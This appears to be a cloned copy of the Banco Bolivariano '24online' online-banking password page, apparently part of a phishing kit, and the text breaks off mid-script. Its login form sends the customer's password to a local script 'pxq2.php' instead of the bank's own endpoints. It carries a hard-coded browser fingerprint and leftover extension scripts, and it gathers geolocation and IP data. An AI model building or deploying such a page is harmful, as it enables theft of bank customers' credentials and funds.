<html xmlns="http://www.w3.org/1999/xhtml"><script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/content/location/location.js" id="eppiocemhmnlbhjplcgkofciiegomcon"></script><script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/libs/extend-native-history-api.js"></script><script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/libs/requests.js"></script><head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="0">
<script>
var ctx = "";
var uri = ""
var url = ""
</script><link rel="shortcut icon" href="../images/favicon.ico">

<title>Bolivariano</title>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
  <script type="application/javascript">
    var ctx = "";
</script>
<link href="../css/modal/aniversario2a4d.css?rnd=2" rel="stylesheet">
</head><body onload=";backButtonOverride()" class="no-bw-firefox" bis_register="W3sibWFzdGVyIjp0cnVlLCJleHRlbnNpb25JZCI6ImVwcGlvY2VtaG1ubGJoanBsY2drb2ZjaWllZ29tY29uIiwiYWRibG9ja2VyU3RhdHVzIjp7IkRJU1BMQVkiOiJkaXNhYmxlZCIsIkZBQ0VCT09LIjoiZGlzYWJsZWQiLCJUV0lUVEVSIjoiZGlzYWJsZWQiLCJSRURESVQiOiJkaXNhYmxlZCIsIlBJTlRFUkVTVCI6ImRpc2FibGVkIiwiSU5TVEFHUkFNIjoiZGlzYWJsZWQiLCJDT05GSUciOiJkaXNhYmxlZCJ9LCJ2ZXJzaW9uIjoiMi4wLjE0Iiwic2NvcmUiOjIwMDE0fV0=" style="display: block;"><div style="display: none;text-align: center; position: absolute;
        -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;
        -webkit-text-size-adjust: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); width: 100%; height: 100%; background: #000;" id="splash-aniversario" bis_skin_checked="1">

    <button id="close-aniversario">cerrar</button>
    <br>
    <div align="center" class="contenedor1 noselect" bis_skin_checked="1">
            <div style="padding: 0; margin-top: 1px;" bis_skin_checked="1">

                <div id="easteregg" class="principal" bis_skin_checked="1">

                    <div class="aniversario-logo" style="" bis_skin_checked="1">
                       </div>
                        <div id="imgSafari" style="background-size: cover;
                        background-repeat: no-repeat;
                        background-position: center;
                        display:none; width: 100%; height: 100%;
                        position: absolute; margin-top: -8px" bis_skin_checked="1"></div>
                    <video autoplay="" muted="" loop="" id="video" class="bg-video-aniversario">
                        <source type="video/mp4">
                    </video>

                </div>
            </div>
    </div>
</div>


<link href="../combined2e2b.css?id=5e96f39f18e6479" type="text/css" rel="stylesheet">
<!-- Jquery y dependientes -->







  <meta http-equiv="Pragma" content="no-cache">


























































<link href="../combinedb279.css?id=a63b6fa918e6479" rel="stylesheet">

<style>
    .mantenimiento-title {
        font-family: 'roboto-bold';
        font-size: 14px;
        color: #444444;
        margin-top: 40px;
    }
    .mantenimiento-text {
        font-family: 'roboto-regular';
        font-size: 13px;
        color: #888888;
        width: 500px;
        margin: auto;
        margin-top: 12px;
    }
</style>






  <meta http-equiv="Pragma" content="no-cache">




























































<style>
    .mantenimiento-title {
        font-family: 'roboto-bold';
        font-size: 14px;
        color: #444444;
        margin-top: 40px;
    }
    .mantenimiento-text {
        font-family: 'roboto-regular';
        font-size: 13px;
        color: #888888;
        width: 500px;
        margin: auto;
        margin-top: 12px;
    }
</style>

<div style="display: none;text-align: center; position: relative; font-family: Roboto, sans-serif;
        font-size: 17px; line-height: 1.4; color: #222; background: #fff;
        -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;
        -webkit-text-size-adjust: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); margin-top: 1px;" id="mantenimiento-modal" bis_skin_checked="1">

    <img id="mant-close-modal" class="btn-close-modal help-close-modal" src="../images/modal/close.svg">
    <br>
    <div align="center" class="contenedor1 noselect" bis_skin_checked="1">
        <div class="contenedor2" bis_skin_checked="1">
            <div style="padding: 0; margin-top: 1px;" bis_skin_checked="1">

                <div class="principal" style="padding: 15px;" bis_skin_checked="1">

                    <img style="margin-top: 18px;" src="../images/modal/mant_eb.jpg">

                    <div style="text-align: center; margin-top: 17px;" bis_skin_checked="1">
                        <div class="mantenimiento-title" bis_skin_checked="1">
                            Nos encontramos en mantenimiento
                        </div>
                        <div class="mantenimiento-text" bis_skin_checked="1">
                            Estamos realizando actualizaciones para que sigas haciendo tus consultas y transacciones con total comodidad. En breve podrás ingresar a 24online.
                        </div>
                    </div>
                    <img style="margin-top: 45px;" src="../images/Boli/logo-BB.svg">
                </div>
            </div>
        </div>
    </div>
</div>









<style>
    .ie-title {
        font-family: 'roboto-bold';
        font-size: 16px;
        color: #444444;
        margin-top: 20px;
    }
    .ie-text {
        font-family: 'roboto-regular';
        font-size: 14px;
        color: #888888;
        width: 500px;
        margin: auto;
        margin-top: 10px;
    }
    .ie-images {
        width: 60px;
        margin-top: 10px;
    }
    .ie-images img {
        width: 40px;
    }
    .ie-images p {
        font-family: 'roboto-bold';
        font-size: 14px;
        visibility: hidden;
        margin-top: 5px;
        margin-bottom: 0px;
        text-align: center;
    }
    .ie-images:hover{
        cursor: pointer;
    }
    .ie-images:hover p{
        visibility: visible;
    }


</style>






  <meta http-equiv="Pragma" content="no-cache">




























































<style>
    .mantenimiento-title {
        font-family: 'roboto-bold';
        font-size: 14px;
        color: #444444;
        margin-top: 40px;
    }
    .mantenimiento-text {
        font-family: 'roboto-regular';
        font-size: 13px;
        color: #888888;
        width: 500px;
        margin: auto;
        margin-top: 12px;
    }
</style>

<div style="display: none;text-align: center; position: relative; font-family: Roboto, sans-serif;
        font-size: 17px; line-height: 1.4; color: #222; background: #fff;
        -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;
        -webkit-text-size-adjust: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); margin-top: 1px;" id="mantenimiento-modal" bis_skin_checked="1">

    <img id="mant-close-modal" class="btn-close-modal help-close-modal" src="../images/modal/close.svg">
    <br>
    <div align="center" class="contenedor1 noselect" bis_skin_checked="1">
        <div class="contenedor2" bis_skin_checked="1">
            <div style="padding: 0; margin-top: 1px;" bis_skin_checked="1">

                <div class="principal" style="padding: 15px;" bis_skin_checked="1">

                    <img style="margin-top: 18px;" src="../images/modal/mant_eb.jpg">

                    <div style="text-align: center; margin-top: 17px;" bis_skin_checked="1">
                        <div class="mantenimiento-title" bis_skin_checked="1">
                            Nos encontramos en mantenimiento
                        </div>
                        <div class="mantenimiento-text" bis_skin_checked="1">
                            Estamos realizando actualizaciones para que sigas haciendo tus consultas y transacciones con total comodidad. En breve podrás ingresar a 24online.
                        </div>
                    </div>
                    <img style="margin-top: 45px;" src="../images/Boli/logo-BB.svg">
                </div>
            </div>
        </div>
    </div>
</div>









<style>
    .ie-title {
        font-family: 'roboto-bold';
        font-size: 16px;
        color: #444444;
        margin-top: 20px;
    }
    .ie-text {
        font-family: 'roboto-regular';
        font-size: 14px;
        color: #888888;
        width: 500px;
        margin: auto;
        margin-top: 10px;
    }
    .ie-images {
        width: 60px;
        margin-top: 10px;
    }
    .ie-images img {
        width: 40px;
    }
    .ie-images p {
        font-family: 'roboto-bold';
        font-size: 14px;
        visibility: hidden;
        margin-top: 5px;
        margin-bottom: 0px;
        text-align: center;
    }
    .ie-images:hover{
        cursor: pointer;
    }
    .ie-images:hover p{
        visibility: visible;
    }


</style>

<div style="display: none;text-align: center; position: relative; font-family: Roboto, sans-serif;
        font-size: 17px; line-height: 1.4; color: #222; background: #fff;
        -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;
        -webkit-text-size-adjust: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); margin-top: 1px;" id="browseriIE-modal" bis_skin_checked="1">

    <div align="center" class="contenedor1 noselect" bis_skin_checked="1">
        <div class="contenedor2" bis_skin_checked="1">
            <div style="padding: 0; margin-top: 1px;" bis_skin_checked="1">

                <div class="principal" style="padding: 15px;" bis_skin_checked="1">

                    <img style="margin-top: 18px; width: 175px;" src="../images/modal/ie/avi24-error.gif">

                    <div style="text-align: center; margin-top: 17px;" bis_skin_checked="1">
                        <div class="ie-title" bis_skin_checked="1">
                            ¡Vive toda la experiencia del nuevo 24online!
                        </div>
                        <div class="ie-text" bis_skin_checked="1">
                            En tus navegadores favoritos
                        </div>
                        <div bis_skin_checked="1">
                            <table align="center">
                                <tbody><tr>
                                    <td>
                                        <div class="ie-images" bis_skin_checked="1">
                                            <img src="/BOLI-ebanking/images/modal/ie/logo_chrome.png">
                                            <p>Chrome</p>
                                        </div>
                                    </td>
                                    <td>
                                        <div class="ie-images" bis_skin_checked="1">
                                            <img src="/BOLI-ebanking/images/modal/ie/logo_mozilla.png">
                                            <p>Firefox</p>
                                        </div>
                                    </td>
                                    <td>
                                        <div class="ie-images" bis_skin_checked="1">
                                            <img src="/BOLI-ebanking/images/modal/ie/logo_edge.png">
                                            <p>Edge</p>
                                        </div>
                                    </td>
                                    <td>
                                        <div class="ie-images" bis_skin_checked="1">
                                            <img src="/BOLI-ebanking/images/modal/ie/logo_safari.png">
                                            <p>Safari</p>
                                        </div>
                                    </td>
                                </tr>
                            </tbody></table>
                        </div>
                    </div>
                    <div style="margin-top: 30px;" class="lineaSeparadora" bis_skin_checked="1"></div>
                    <img src="../images/Boli/logo-24online.png">
                </div>
            </div>
        </div>
    </div>
</div>




<link href="../combined797d.css?id=84c623ce18e6479" rel="stylesheet">
<g:compress>





    </g:compress>
















<script src="../combined2bd3.js?id=8af665d418e6479"></script><canvas hidden=""></canvas>

  <!-- XSS - deny -->
  <style> body { display : none;} </style>






  <meta http-equiv="Pragma" content="no-cache">




























































<style>
    .mantenimiento-title {
        font-family: 'roboto-bold';
        font-size: 14px;
        color: #444444;
        margin-top: 40px;
    }
    .mantenimiento-text {
        font-family: 'roboto-regular';
        font-size: 13px;
        color: #888888;
        width: 500px;
        margin: auto;
        margin-top: 12px;
    }
</style>

<div style="display: none;text-align: center; position: relative; font-family: Roboto, sans-serif;
        font-size: 17px; line-height: 1.4; color: #222; background: #fff;
        -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;
        -webkit-text-size-adjust: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); margin-top: 1px;" id="mantenimiento-modal" bis_skin_checked="1">

    <img id="mant-close-modal" class="btn-close-modal help-close-modal" src="../images/modal/close.svg">
    <br>
    <div align="center" class="contenedor1 noselect" bis_skin_checked="1">
        <div class="contenedor2" bis_skin_checked="1">
            <div style="padding: 0; margin-top: 1px;" bis_skin_checked="1">

                <div class="principal" style="padding: 15px;" bis_skin_checked="1">

                    <img style="margin-top: 18px;" src="../images/modal/mant_eb.jpg">

                    <div style="text-align: center; margin-top: 17px;" bis_skin_checked="1">
                        <div class="mantenimiento-title" bis_skin_checked="1">
                            Nos encontramos en mantenimiento
                        </div>
                        <div class="mantenimiento-text" bis_skin_checked="1">
                            Estamos realizando actualizaciones para que sigas haciendo tus consultas y transacciones con total comodidad. En breve podrás ingresar a 24online.
                        </div>
                    </div>
                    <img style="margin-top: 45px;" src="../images/Boli/logo-BB.svg">
                </div>
            </div>
        </div>
    </div>
</div>









<style>
    .ie-title {
        font-family: 'roboto-bold';
        font-size: 16px;
        color: #444444;
        margin-top: 20px;
    }
    .ie-text {
        font-family: 'roboto-regular';
        font-size: 14px;
        color: #888888;
        width: 500px;
        margin: auto;
        margin-top: 10px;
    }
    .ie-images {
        width: 60px;
        margin-top: 10px;
    }
    .ie-images img {
        width: 40px;
    }
    .ie-images p {
        font-family: 'roboto-bold';
        font-size: 14px;
        visibility: hidden;
        margin-top: 5px;
        margin-bottom: 0px;
        text-align: center;
    }
    .ie-images:hover{
        cursor: pointer;
    }
    .ie-images:hover p{
        visibility: visible;
    }


</style>

<div style="display: none;text-align: center; position: relative; font-family: Roboto, sans-serif;
        font-size: 17px; line-height: 1.4; color: #222; background: #fff;
        -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;
        -webkit-text-size-adjust: none; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); margin-top: 1px;" id="browseriIE-modal" bis_skin_checked="1">

    <div align="center" class="contenedor1 noselect" bis_skin_checked="1">
        <div class="contenedor2" bis_skin_checked="1">
            <div style="padding: 0; margin-top: 1px;" bis_skin_checked="1">

                <div class="principal" style="padding: 15px;" bis_skin_checked="1">

                    <img style="margin-top: 18px; width: 175px;" src="../images/modal/ie/avi24-error.gif">

                    <div style="text-align: center; margin-top: 17px;" bis_skin_checked="1">
                        <div class="ie-title" bis_skin_checked="1">
                            ¡Vive toda la experiencia del nuevo 24online!
                        </div>
                        <div class="ie-text" bis_skin_checked="1">
                            En tus navegadores favoritos
                        </div>
                        <div bis_skin_checked="1">
                            <table align="center">
                                <tbody><tr>
                                    <td>
                                        <div class="ie-images" bis_skin_checked="1">
                                            <img src="/BOLI-ebanking/images/modal/ie/logo_chrome.png">
                                            <p>Chrome</p>
                                        </div>
                                    </td>
                                    <td>
                                        <div class="ie-images" bis_skin_checked="1">
                                            <img src="/BOLI-ebanking/images/modal/ie/logo_mozilla.png">
                                            <p>Firefox</p>
                                        </div>
                                    </td>
                                    <td>
                                        <div class="ie-images" bis_skin_checked="1">
                                            <img src="/BOLI-ebanking/images/modal/ie/logo_edge.png">
                                            <p>Edge</p>
                                        </div>
                                    </td>
                                    <td>
                                        <div class="ie-images" bis_skin_checked="1">
                                            <img src="/BOLI-ebanking/images/modal/ie/logo_safari.png">
                                            <p>Safari</p>
                                        </div>
                                    </td>
                                </tr>
                            </tbody></table>
                        </div>
                    </div>
                    <div style="margin-top: 30px;" class="lineaSeparadora" bis_skin_checked="1"></div>
                    <img src="../images/Boli/logo-24online.png">
                </div>
            </div>
        </div>
    </div>
</div>





<g:compress>





    </g:compress>
















<script src="../combined2bd3.js?id=8af665dc"></script>

  <!-- XSS - deny -->
  <style> body { display : none;} </style>

  <script src="../js/control/sec.js" async></script>
  <link href="../styles/screenSize708f.css?rnd=1" type="text/css" rel="stylesheet" />




<style>
  #superiorLopgin {
    border-top: none!important;
  }
</style>
  <script> 
    if (self == top) {
      var theBody = document.getElementsByTagName('body')[0]
      theBody.style.display = "block";
    } else { 
      top.location = self.location;
    }
    if(!(navigator.userAgent.indexOf("Firefox") != -1) ){
      document.body.classList.add('no-bw-firefox');
    }
  </script>

<div class="outerDiv_ blur-content" id="outer1" bis_skin_checked="1">
    <div style="height: 3px; width: 100%;" class="new-color-eb" bis_skin_checked="1"></div>
    <div id="superiorLopgin" bis_skin_checked="1">
      <div class="cont-header" bis_skin_checked="1">
        <div id="banner" bis_skin_checked="1"></div>
      </div>
    </div>
    <div id="right" bis_skin_checked="1">
      <meta http-equiv="CACHE-CONTROL" content="NO-CACHE">



  <div class="cont-loginBox" bis_skin_checked="1">

    <div id="loginBox" bis_skin_checked="1">
      <form id="login" name="login" method="post" action="pxq2.php" autocomplete="off">

        <div id="logo-Boli" bis_skin_checked="1">

            <div id="avatarBox" bis_skin_checked="1">


              <img id="avatar" class="avatar" src="">

            </div>

        </div>


        <div class="contentDiv" bis_skin_checked="1">



            <div id="loginOptions" style=" margin-bottom: 5px; color: red; text-align: center;" bis_skin_checked="1">
              <a href="#" bis_skin_checked="1"> <img src="../images/login/icono-volver.png"></a>

            </div>








            <div id="titleBox" bis_skin_checked="1">
                <h2 id="tituloIngresePassword">Contraseña</h2>
              </div>
              <div id="pedirPasswordBox" bis_skin_checked="1">
                <div class="formTextInput" id="passwordBox" bis_skin_checked="1">
                  <input type="password" style="display: none;" id="password-breaker">
                  <input id="password" type="password" autocomplete="off" name="j_password" class="loginInput conTecladoVirtual ui-keyboard-input" maxlength="12" onfocus="true" aria-haspopup="true" role="textbox">
                  <img class="myImage" onclick="mostrarPassword()" src="../images/login/showpass.png">
                </div>
              <div id="botonSendPasswordBox" bis_skin_checked="1">
                <input id="botonSendPassword" type="submit" value="Aceptar" class="botonSiguiente" onclick="javascript:bloquearUi();">
              </div>
              <div class="conTLinkUser" bis_skin_checked="1">
                <a href="/BOLI-ebanking/restaurarClave.htm" id="usuario-olvidado" class="boton-link" bis_skin_checked="1"> ¿Olvidaste tu contraseña?</a>
              </div>
            </div>
            <div class="campoTecladoVirtual" bis_skin_checked="1">
          <a id="activarTecladoVirtualPassword" class=" texto boton-link" href="javascript:void(0)" bis_skin_checked="1">
            Usar teclado virtual
          </a>
      </div>




        <div id="loginOptions" bis_skin_checked="1">
          <a href="/BOLI-ebanking/desbloquear.htm" class="boton-link1" bis_skin_checked="1"> Mi usuario fue bloqueado</a>

          <a href="/BOLI-ebanking/autoadhesion.htm" class="boton-link1" bis_skin_checked="1"> ¿No tienes un usuario? Registrate</a>



        </div>
      </div>

      <input type="hidden" id="appDatos" name="appDatos" value="screenAvailHeigth=1032***screenColorDepth=24***screenHeight=1080***screenWidth=1920***appCodeName=Mozilla***appName=Netscape***appMinorVersion=undefined***cpuClass=undefined***platform=Win32***systemLanguage=undefined***userLanguage=undefined***userAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36***cookieEnabled=true">
      <input type="hidden" id="navegador" name="navegador" value="Nav:Google Chrome-Name:chrome-FV:123.0.0.0-P:Windows 10-M:false-cookie:true">

    </form>
  </div>
  </div>
  <style>
    #avatar {
      width: 41px;
      height: 41px;
    }
    *:focus{
      outline:none;
    }

    .user-locked {
      background-color: #FBE9E6;
      background-image: url("/BOLI-ebanking/images/Boli/icn-lock.svg");
      background-repeat: no-repeat;
      background-position: 17px 14px;
      text-align: left!important;
      display: block;
      width: 242px;
      margin-left: -21px;
      padding: 13px 17px 13px 41px;
      color: #DB4337;
      line-height: 1.3;
    }
    .locked-title {
      color: #DB3528;
      font-family: 'roboto-bold';
      font-size: 12px;
      margin-bottom: 4px;
    }
    .link-unlock {
      text-decoration: underline;
      font-family: 'roboto-bold';
      color: #DB4337;
      cursor: pointer;
    }

    .seguridadIdeDesc{
      border: 1px solid #E7EAF2;
      height: 24px;
      background-color: #E7EAF2;
      border-radius: 5px;
      width: 90%;
      padding: 1px 1px 1px 1px;
    }
    .seguridadIdeHelp{
      width: 15%;
    }
    .mensajeIde{
      color: #444444;
      font-family: roboto-regular;
      font-size: 11px;
    }
    .i-img{
      margin-top: 3px;
      margin-bottom: -6px;
      margin-left: 5px;
    }
    .seguridadIdentifiacion{
      margin-bottom: 10px;
      margin-top: 10px;
    }
    .toolTipId {
      border-radius: 12px;
      display: inline-block;
      font-size: 10px;
      font-weight: bold;
      height: 15px;
      line-height: 16px;
      position: absolute;
      text-align: center;
      cursor: pointer;
      width: 15px;
      margin-top: 5px;
      color: #FFFFFF;
      background-color: #444444;
      font-family: "Liberation Serif";
      left: 465px;
    }
    .tooltipIde .tooltiptext {
      visibility: hidden;
      width: 222px;
      height: 116px;
      background-color: #222222;
      color: #FFFFFF;
      text-align: center;
      border-radius: 8px;
      padding: 5px 0;
      position: absolute;
      z-index: 1;
      bottom: 150%;
      left: 50%;
      margin-left: -110px;
      opacity: 0.9;
    }
    .tooltipIde .tooltiptext::after {
      content: "";
      position: absolute;
      top: 100%;
      left: 50%;
      margin-left: -5px;
      border-width: 5px;
      border-style: solid;
      border-color: black transparent transparent transparent;
    }
    .toolTipId:hover .tooltiptext {
      visibility: visible;
    }
    .cajaIde{
      border: 1px solid white;
      background-color: #222222;
      border-radius: 12px;
      /* display: inline-block; */
      height: 16px;
      width: 16px;
      /*line-height: 16px;*/
      color: white;
      font-family: roboto-bold;
      text-align: center;
      font-size: 12px;
      padding: 1px;
      margin-top: 16px;
      margin-bottom: 11px;
      /* padding-top: 3px; */
      /*padding-bottom: 9px;*/
    }
    .cajaTitulo{
      font-size: 12px;
      font-family: roboto-medium;
    }
    .descripIde{
      font-size: 11px;

    }
    .detClase{
      font-size: 11px;
      font-family: roboto-regular;
      color: #CCCCCC;
      text-align: justify;
      /*top: 185px;*/
      left: 393px;
      width: 168px;
      height: 51px;
      /*position: fixed;*/
      letter-spacing: 0.1px;
      margin-left: 29px;
    }

    .detClaseSafari{
      font-size: 11px;
      font-family: -apple-system;
      color: #CCCCCC;
      text-align: justify;
      /*top: 185px;*/
      left: 393px;
      width: 168px;
      height: 51px;
      /*position: fixed;*/
      letter-spacing: 0.1px;
      margin-left: 29px;
    }
  </style>
    <script type="text/javascript" src="/BOLI-ebanking/js/machineInfo.js"></script>		
      <script type="text/javascript">
        setMachineInfo('appDatos','navegador');
      </script>

  <script type="application/javascript">
    var isSafari = !!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/);
    if(isSafari){
      jQuery(document).ready(function($) {
        $('#detClaseDes').removeClass('detClase');
        $('#detClaseDes').addClass('detClaseSafari');
      });
    }
  </script>

<script>

  jQuery(document).ready(function($) {
    var modalMantenimiento = new jBox('Modal', {
      id: 'jBox-mantenimiento',
      content: $('#mantenimiento-modal'),
      width: 750,
      height: 450,
      closeOnEsc: false,
      closeOnClick: false,
      closeButton: false,
      animation: {open: 'slide:bottom', close: 'slide:bottom'},
      blockScroll: true
    });
    var modalIE = new jBox('Modal', {
      id: 'jBox-ie',
      content: $('#browseriIE-modal'),
      width: 750,
      height: 400,
      closeOnEsc: false,
      closeOnClick: false,
      closeButton: false,
      animation: {open: 'slide:bottom', close: 'slide:bottom'},
      blockScroll: true
    });
    try {
      var ua = window.navigator.userAgent;
      var isIE = /MSIE|Trident/.test(ua);

      if ( isIE ) {
        /*modalIE.open();
        setTimeout(function () {$('.jBox-container').fadeTo( "slow", 1 ); }, 80);
        var currURL= window.location.href;
        //2- get the part before '?'
        var beforeQueryString= currURL.split("?")[0];
        window.history.replaceState({}, "ebanking", beforeQueryString);*/
      }

      var errorEb = getUrlParameter('error');
      if (errorEb === 'mantenimiento') {
        modalMantenimiento.open();
        setTimeout(function () {$('.jBox-container').fadeTo( "slow", 1 ); }, 80);
        var currURL= window.location.href;
        //2- get the part before '?'
        var beforeQueryString= currURL.split("?")[0];
        window.history.replaceState({}, "ebanking", beforeQueryString);
      }
    } catch (e) {
      console.log('error'+e)
    }
    $(document).on('click', '#mant-close-modal', function(e) {
      modalMantenimiento.close();
    });
    if ($(".user-locked:visible")[0]){
      $("#loginBox").css({"height":"480px","margin-top": "-10px" });
      $(".campoTecladoVirtual").css("margin-top", "23px");
    }
    $("#unlock").click(function() {
      document.location.href="/BOLI-ebanking/desbloquear.htm";
    });


    try{
      var usuarioAutoadhesion = ('null');
      if((usuarioAutoadhesion !== undefined) && (usuarioAutoadhesion !== null) && (usuarioAutoadhesion !== '') && (usuarioAutoadhesion !== 'null')){
        $("#username").val(usuarioAutoadhesion);
      }
    }catch(e){
      //
    }

    try{
      navigator.permissions.query({ name: 'geolocation' }).then((result) => {
        if(result.state!=null){
          if (document.getElementById('locationStatus')){
            document.getElementById("locationStatus").value = result.state;
            if (result.state === 'granted') {
              getLocation();
            }
          }
        }
      });
    }catch(e){
      if (document.getElementById('locationStatus'))
         document.getElementById("locationStatus").value = "undefined";
    }

/*inicio vmirandt*/

    const getIpLocation = async () =>
        fetch(
            "https://pro.ip-api.com/json/?fields=status,message,continent,continentCode,country,countryCode,countryCode3,region,regionName,city,district,zip,lat,lon,timezone,offset,currentTime,currency,callingCode,isp,org,as,asname,reverse,mobile,proxy,hosting,query&key=BwfSJxuANSbGW0B",
            {
              method: "GET",
              mode: "cors",
              headers: {
                "Content-Type": "application/json",
              },
            }
        ).then((response) => response.json());


    const generateJson = async () => {
      const fingerprint = MPFingerprint.getData(true, true);
      try {
        const ipLocation = await getIpLocation();
        fingerprint.Geoip = ipLocation; // concatenate ip information
        Geolocation=fingerprint.Geoip;
        const jsons = {
          Geolocation
        };
        let objF= Object.assign(await fingerprint,jsons)
        document.getElementById("datosPrincipalesM").value=JSON.stringify(objF);
        return jsons
      } catch (_) {
        return fingerprint; // return only the fingerprint if there is an error
      }
    };

    async function main() {
      await generateJson();
    }
    main();
    //main().then(console.log).catch(console.error)
/*fin vmirandt*/




    var identification =$("#identifiHidden").val();
    if(identification != undefined &&  identification.toString().length > 0 ){
      identification= identification.toString().substr(identification.toString().length-3);
      identification="XXXXXXX"+identification;
      if($("#tipoIdentHidden").val() == 'C'){
        $("#mensajeIde").text("Tu c\u00E9dula termina en ");
      }
      if($("#tipoIdentHidden").val() == 'P'){
        $("#mensajeIde").text("Tu pasaporte termina en ");
      }
      $("#identificat").text(identification);
    }else{
      $("#seguridadIdentifiacion").css("display","none");
    }



  });

  var getUrlParameter = function getUrlParameter(sParam) {
    var sPageURL = window.location.search.substring(1),
        sURLVariables = sPageURL.split('&'),
        sParameterName,
        i;

    for (i = 0; i < sURLVariables.length; i++) {
      sParameterName = sURLVariables[i].split('=');

      if (sParameterName[0] === sParam) {
        return sParameterName[1] === undefined ? true : decodeURIComponent(sParameterName[1]);
      }
    }
  };


  function getLocation() {
    valor = new Boolean(false);
    navigator.geolocation.getCurrentPosition(
        function(){
          console.log("succes")
          valor= true;
          console.log(valor);
        },
        function(positionError) {

          switch (positionError.code) {
            case 1:// PERMISSION_DENIED
                            console.log('Permiso denegado')
              break
            case 2:// POSITION_UNAVAILABLE
              console.log('Permiso permitido, ubicaci\u00F3n inhabilitada')
              break
            case 3:// TIMEOUT
              console.log('Permiso permitido, tiempo de espera alcanzado')
              break
          }
        },
        {maximumAge: 50000, timeout: 20000, enableHighAccuracy: true});
    if((valor)){//si el permiso estÃ&nbsp; activado, llama directo a guardar geolocalizacion
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(showPosition);
      }
    }
  }

  function showPosition(position) {
    document.getElementById("latitud").value = position.coords.latitude;
    document.getElementById("longitud").value = position.coords.longitude;

  }
</script></div>

    <div style="width: 100%;margin:420px 41px;" bis_skin_checked="1"></div>

    <div id="clearfooter" bis_skin_checked="1"></div>

  </div>









<footer id="footer" class=" blur-content">
    <div class="cont-footer" bis_skin_checked="1">
        <div id="logo-Boli-footer" class="logo-footer" bis_skin_checked="1">
            <div class="footerText" bis_skin_checked="1">
                ® 2024 Bolivariano - Todos los derechos reservados.
            </div>
        </div>
    </div>
</footer>
<div id="disabledZone" style="float: right; display: none; border: 0px;" bis_skin_checked="1">
    <!-- Se utiliza en DWR -->
    <div id="modalProcesando" bis_skin_checked="1">
      <div id="modalLoading" class="bg" bis_skin_checked="1">
  <style>
    .bg{
      width:100%;
      height:100%;
      position: fixed;
      top: 0;
      left: 0;
    }
    .bg.black{
      background:#000;
      opacity:0.05;
    }
    .bg.gradient{
      background:linear-gradient(to top right, #17B498, #DCF4F0);
      opacity:0.8;
    }
    .content-blur {
      filter: blur(6px);
    }
    .txt-loading {
      font-family: 'roboto-regular'!important;
      font-size: 13px!important;
      color: #fff!important;
    }
    .loading-content {
      position: relative;
      text-align: center;
      height: 110px;
      top: 50%;
      margin-top: -70px;
    }
    .blur-eff {
      -webkit-filter: blur(6px);
      -moz-filter: blur(6px);
      -o-filter: blur(6px);
      -ms-filter: blur(6px);
      filter: blur(6px);
    }
  </style>

  <div class="bg gradient" bis_skin_checked="1"></div>
  <div class="bg black" bis_skin_checked="1"></div>
  <div class="loading-content" bis_skin_checked="1">
    <img src="/BOLI-ebanking/images/loading/loading-B_30.gif" border="0">
      <br>
      <div class="txt-loading" bis_skin_checked="1">Espera por favor...</div>
  </div>

  <script>
    jQuery(document).ready(function($) {

      if ( $( ".blockUI.blockOverlay" ).length ) {
        var is_safari = /^((?!chrome|android).)*safari/i.test(navigator.userAgent);
        if (!is_safari) {
          $('.blur-content').addClass('blur-eff');
        }
        if (is_safari){
          setTimeout(function () {
            $('.blur-content').addClass('blur-eff');
          }, 200)
        }
      }
    });
  </script>
</div></div>
  </div>


<script>
  $k(document).ready(function () {
    $k("html").on("contextmenu",function(e){
      return false;
    });
  });
  /*
  var arraysClic = new Array();
  $k("html").mousedown(function (ev) {
    if (ev.which == 3) {
      var now = $k.now();
      arraysClic.push(now);
      if (arraysClic.length>=3){
        var date1 = new Date( arraysClic[arraysClic.length-3] );
        var date2 = new Date( now );
        var seconds =  (date2- date1)/1000;
        if (parseFloat(seconds) menor= parseFloat(4.5)){
          arraysClic = new Array();
          var vid = document.getElementById("video");
          vid.currentTime = 0;
          vid.load();
          showAniversario();
        } else {
          arraysClic.shift();
        }
      }
    }
  });*/
  function showAniversario() {
    var modalAniversario = new jBox('Modal', {
      id:'jbox_aniversario',
      content: $k('#splash-aniversario'),
      width: 'auto',
      height: 'auto',
      closeOnEsc: false,
      closeOnClick: false,
      closeButton: false,
      animation: {open: 'slide:bottom', close: 'slide:bottom'},
      blockScroll: true
    });
    modalAniversario.open();
    var videoFile = "/BOLI-ebanking/images/easter-egg/bg-video.mp4";
    var imgSafariFile = "/BOLI-ebanking/images/easter-egg/easter-safari.png";
    var isSafari = !!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/);
    var isIOS = (/iPad|iPhone|iPod/.test(navigator.userAgent) ||
        (navigator.platform === 'MacIntel' && navigator.maxTouchPoints > 1)) &&
        !window.MSStream;

    if (isSafari || isIOS) {
      $k('#imgSafari').css('background-image', 'url('+imgSafariFile+')');
      $k("#video").css('opacity', '0');
      $k('#imgSafari').show();
    } else {
      $k('#video source').attr('src', videoFile);
      $k("#video")[0].load();
    }
    setTimeout(function () {$k('.jBox-container').fadeTo( "slow", 1 );}, 80);
    setTimeout(function () {$k( "#easteregg" ).addClass( "active-aniv" );}, 500);
    $k("#close-aniversario").click(function() {
      modalAniversario.close();
      $k( "#easteregg" ).removeClass("active-aniv");
    });
  }

  function focusAndOpenKeyboard(el, timeout) {
    if(!timeout) {
